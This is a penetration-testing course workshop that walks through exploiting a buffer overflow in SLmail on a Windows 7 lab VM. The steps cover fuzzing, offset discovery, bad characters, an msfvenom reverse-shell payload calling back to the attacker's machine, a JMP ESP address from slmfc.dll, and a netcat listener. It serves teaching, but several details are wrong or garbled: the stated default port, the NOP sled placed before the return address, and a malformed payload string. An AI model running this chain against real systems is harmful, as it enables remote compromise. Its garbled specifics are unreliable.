G4G0-2/Penetration Testing/Week 19/Steps to Complete Workshop 2.md

1. Prepare Parrot OS and Windows 7 VM:
   • Start your UTM instance with both Parrot OS (NAT mode) and Windows 7 VMs active.
   • Switch Parrot OS to "Host-only network" mode and note down its IP address.
   • Ensure you can ping Windows 7 VM from Parrot OS.
2. Download required files:
   • Download the "Scripts.zip" file from Blackboard (T2, Week 2) on your Parrot OS.
   • Extract the contents of "Scripts.zip" to a convenient location, e.g., /opt/exploit-dev/scripts/.
3. Run SLmail and Immunity Debugger (ID):
   • Start SLmail on Windows 7 VM.
   • Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black area > appearance > font > OEM.
4. Attach SLmail to ID:
   • In Immunity Debugger, go to File > Attach…, select the SLmail process, and click 'Open'.
   • Set the debugger to "Running" state by clicking on the "Running" button in the toolbar.
5. Run the fuzzer:
   • Open a terminal on Parrot OS and navigate to the scripts directory.
   • Run python fuzzer.py <Windows 7 VM IP address> 49500 (SLmail's default port is 49500) to start fuzzing the application.
   • The goal is to Crash SLmail by sending random data.
6. Generate unique 4-byte patterns:
   • Run ruby pattern_create.rb <length> (e.g., ruby pattern_create.rb 100) to generate a unique 4-byte pattern that will help in identifying the crash location.
7. Find the starting offset:
   • Send the generated pattern to SLmail using the fuzzer and observe where it crashes. The offset is the number of bytes before the crash location.
   • Use python pattern_offset.rb <crash_location> to calculate and confirm the offset.
8. Verify the offset:
   • Send a crafted payload with the correct EIP overwritten to ensure that our previous steps were accurate.
   • Use python sendshell.py <Windows 7 VM IP address> 49500 "<EIP>" "stupid string" to send the crafted payload.
9. Check for space in the stack:
   • Send approximately 800 bytes after the EIP location to verify there's enough space for our payload.
   • Use ruby space.rb <offset> 800 to check the available space.
10. Find bad characters:
    • Identify byte values that cause the application to behave unexpectedly (e.g., crash or exhibit unexpected behavior).
    • Use ruby badchars.rb <Windows 7 VM IP address> 49500 <offset> to find and list bad characters.
11. Create shellcode:
    • Use msfvenom to create a payload (shellcode) with the appropriate architecture and privileges, excluding the bad characters identified earlier.
    • Run msfvenom -p windows/shell_reverse_tcp LHOST=<Parrot OS IP address> LPORT=443 -a x86 --bad-chars=<bad_characters> -f raw to generate the shellcode.
12. Identify DLL without memory protections:
    • Use !mona modules in Immunity Debugger to identify DLLs without memory protections.
    • Our target is slmfc.dll.
13. Find JMP ESP address:
    • Use nasm_shell to get opcodes for JMP ESP (FF E4).
    • Run nasm_shell> ff e4 to get the opcodes.
    • Use !mona find -s "\xff\xe4" -m slmfc.dll to search for the FF E4 opcode in slmfc.dll and choose an address (e.g., 0x5f4a358f) as the new EIP.
14. Prepare exploit script:
    • Replace Bs in the exploit script (e.g., exploit.rb) with the address chosen earlier.
    • Add a NOP sled (e.g., \x90 16) before the JMP ESP address to account for any slight miscalculations or fluctuations in memory layout.
    • The exploit script should look something like this: "\x90" * 16 + "\xff\x\xe4" + "\xbe\xxx\xxxx\xxx\xxx". Replace Bs with the chosen address.
15. Start netcat listener:
    • On Parrot OS, run nc -lvp 443 to start a netcat listener on port 443.
16. Run exploit:
    • Execute the prepared exploit script with ruby exploit.rb <Windows 7 VM IP address> 49500.
    • Once the exploit triggers, you should get a shell on the Windows 7 VM.